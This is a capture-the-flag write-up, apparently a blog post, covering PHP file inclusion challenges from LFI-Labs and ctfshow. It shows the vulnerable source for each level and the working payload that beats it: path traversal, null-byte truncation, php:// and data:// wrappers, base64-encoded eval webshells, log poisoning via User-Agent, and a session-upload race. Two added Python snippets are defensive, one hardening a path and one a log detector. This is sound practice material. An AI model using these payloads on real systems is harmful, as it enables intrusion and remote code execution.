File inclusion vulnerability range practice

Lfi-Labs

Description

This environment runs on phpStudy; phpinfo.php exists in the website root directory and is used as the target file in the examples below.

LFI-1

Source code:

<?php
include($_GET["page"]);
?>

payload:

?page=phpinfo.php

I found that this did not work; use ../ to go back one level.

LFI-2

Source code:

<?php
include("includes/".$_GET['library'].".php"); 
?>

Here a .php suffix is appended to the file name taken from the input variable.
Example: enter phpinfo.php and it becomes phpinfo.php.php, which obviously does not exist.
Use %00 here to truncate the string.

payload:

?library=../../phpinfo.php%00

Conditions for %00 truncation:

(1) The PHP version is lower than 5.3.4.
(2) magic_quotes_gpc in PHP is OFF.

If both conditions are met but the payload still does not work, you can use Burp Suite to capture and resend the request:

But I still couldn't get it to work here; it just breaks.

LFI-3

Source code:

<?php
if (substr($_GET['file'], -4, 4) != '.php')
    echo file_get_contents($_GET['file']);
else
    echo 'You are not allowed to see source files!'."\n";
?>

Here there is a check: the last four characters of the input parameter must not be .php.
This level exploits a property of the Windows file system: a trailing dot in a file name is automatically dropped when the name is resolved, so phpinfo.php. opens phpinfo.php while the check sees a name ending in "php.".

Therefore, the payload:

?file=../../phpinfo.php.

LFI-4

Source code:

<?php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>

The parameter is filtered with the addslashes() function:

addslashes() returns a string with a backslash added before each predefined character.

The predefined characters are:

Single quotation mark (')
Double quotation mark (")
Backslash (\)
NULL

But this challenge automatically appends a .php suffix, so the payload omits the extension:

payload:

?class=../../../../../phpinfo

LFI-5

Source code:

<?php
    $file = str_replace('../', '', $_GET['file']);
    if(isset($file))
    {
        include("pages/$file");
    }
    else
    {
        include("index.php");
    }
?>

The code replaces ../ with an empty string in a single pass (not recursively), so double-write the sequence: after one pass of the replacement a ../ is left behind.
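As an added example (not the challenge's own code), a Python sketch of how the LFI-5 include could be hardened: instead of deleting ../ once, resolve the requested path and refuse anything that does not end up under an assumed pages directory, with the NUL, wrapper and extension checks the earlier levels bypass. PAGES_DIR and both function names are assumptions made for the demo.

```python
import os
from typing import Optional

# Assumed directory that include("pages/$file") is meant to serve from.
PAGES_DIR = "/var/www/html/pages"


def naive_strip(user_path: str) -> str:
    """Port of the LFI-5 filter: one non-recursive str_replace('../', '')."""
    return user_path.replace("../", "")


def resolve_page(user_path: str, base_dir: str = PAGES_DIR) -> Optional[str]:
    """Return the absolute path to include, or None if the request must be refused.

    Rather than stripping bad substrings, resolve the path and check that the
    result still lies under base_dir. The checks mirror the tricks on this page:
    %00 truncation (LFI-2), stream wrappers and absolute paths, the trailing-dot
    extension trick (LFI-3) and any form of traversal (LFI-1, LFI-5).
    """
    if "\x00" in user_path:                       # NUL byte truncation
        return None
    if "://" in user_path or user_path.startswith(("/", "\\")):
        return None                               # php://, data://, absolute paths
    if not user_path.endswith(".php"):            # allowlist the expected extension;
        return None                               # "phpinfo.php." is rejected here
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        return None                               # resolved outside the pages dir
    # "....//x.php" is harmless here: with no stripping it is just a sub-path
    # of base_dir that does not exist, not a traversal.
    return candidate
```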

ctfshow

web 78

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

payload:

?file=php://filter/convert.base64-encode/resource=flag.php

web 79

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

The string php is replaced, so php:// wrappers cannot be used; the data:// wrapper still works.

payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= ===> <?php system('cat flag.php');

web 80-81

Log file inclusion: write a one-line webshell (一句话木马) into the log, then include the log file to get a webshell.

Log file: /var/log/nginx/access.log

Use Burp Suite to capture the request and put the one-line webshell in the User-Agent header.

Connect with China Chopper or AntSword.

web 82-86

File inclusion via session.upload_progress

POC:

#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="1234" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

Upload any file and modify the request as follows. The value here exists only so that a brute-force (Intruder) parameter can be attached to it; the actual value does not matter.

In the challenge environment, pass in ?file=/tmp/sess_flag, capture the request and mark the brute-force parameters.
Run the brute force on both requests at the same time; with continuous requests there will always be one that hits while the session file has been written but not yet cleared.
Get the flag file name and modify the script:

<?php system('cat fl0g.php');?>

Continue brute-forcing and get the flag.

web 87

On the clever use of php://filter

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
    highlight_file(__FILE__);
}

1. Use the convert.base64-decode write filter so that the <?php die('大佬别秀了');?> prefix is destroyed when the file is written:

php://filter/write=convert.base64-decode/resource=3.php

2. Prepend aa to the content, so that phpdie (the characters of the prefix that survive base64 decoding) becomes 8 characters and satisfies the base64 length requirement (a multiple of 4).

3. Double URL-encode the file parameter, since the filters block php, data, : and . but the code calls urldecode() afterwards:

%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30

4. Pass in the content parameter via POST:

content=aaPD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==
PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg== --> <?php @eval($_POST[1]);?>

5. Connect to 3.php with China Chopper or AntSword to get the webshell.

web 88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

payload:

?file=data://text/plain;base64,PD9waHAgICBzeXN0ZW0oIm5sICoucGhwIik7Pz4

The trailing = is deleted because the regex blocks =; PHP's base64 decoder tolerates the missing padding.
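As an added example, not from the original write-up: a small Python detector that runs the payload patterns seen on this page (../ traversal and the ....// double-write, %00 truncation, php:// and data:// wrappers, double URL encoding, inclusion of the nginx log or /tmp/sess_ files, and PHP code planted in the User-Agent for log poisoning) over constructed nginx access.log lines. The log lines, IPs and rule names are made up for the demo.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed nginx access.log sample (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2021:10:00:01 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Feb/2021:10:00:02 +0000] "GET /index.php?page=../../phpinfo.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Feb/2021:10:00:03 +0000] "GET /index.php?library=../../phpinfo.php%00 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Feb/2021:10:00:04 +0000] "GET /index.php?file=....//....//phpinfo.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Feb/2021:10:00:05 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Feb/2021:10:00:06 +0000] "GET /index.php?file=%25%37%30%25%36%38%25%37%30%3a//filter/resource=x HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Feb/2021:10:00:07 +0000] "GET / HTTP/1.1" 200 100 "-" "<?php phpinfo();?>"
10.0.0.7 - - [10/Feb/2021:10:00:08 +0000] "GET /index.php?file=/var/log/nginx/access.log HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Each rule is applied to the fully URL-decoded request URI.
URI_RULES = [
    ("path-traversal", re.compile(r"\.\./")),              # ../ and the ....// double-write
    ("null-byte-truncation", re.compile("\x00")),           # %00 after decoding
    ("stream-wrapper", re.compile(r"\b(php|data|phar|zip|file)://", re.I)),
    ("log-or-session-file", re.compile(r"/var/log/|/tmp/sess_", re.I)),
]
# Log poisoning: PHP code in a header that nginx writes into access.log.
UA_RULE = ("log-poisoning", re.compile(r"<\?(php|=)", re.I))


def decode_twice(s: str) -> str:
    """Undo double URL encoding so %25%37%30... is seen as the 'php' it hides."""
    return unquote(unquote(s))


def scan_access_log(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, rule_name, client_ip) for every suspicious line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue                       # not combined format; skip
        uri = decode_twice(m["uri"])
        for name, rx in URI_RULES:
            if rx.search(uri):
                findings.append((n, name, m["ip"]))
        if UA_RULE[1].search(m["ua"]):     # the header is checked undecoded
            findings.append((n, UA_RULE[0], m["ip"]))
    return findings
```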

Origin blog.csdn.net/qq_45742511/article/details/113799879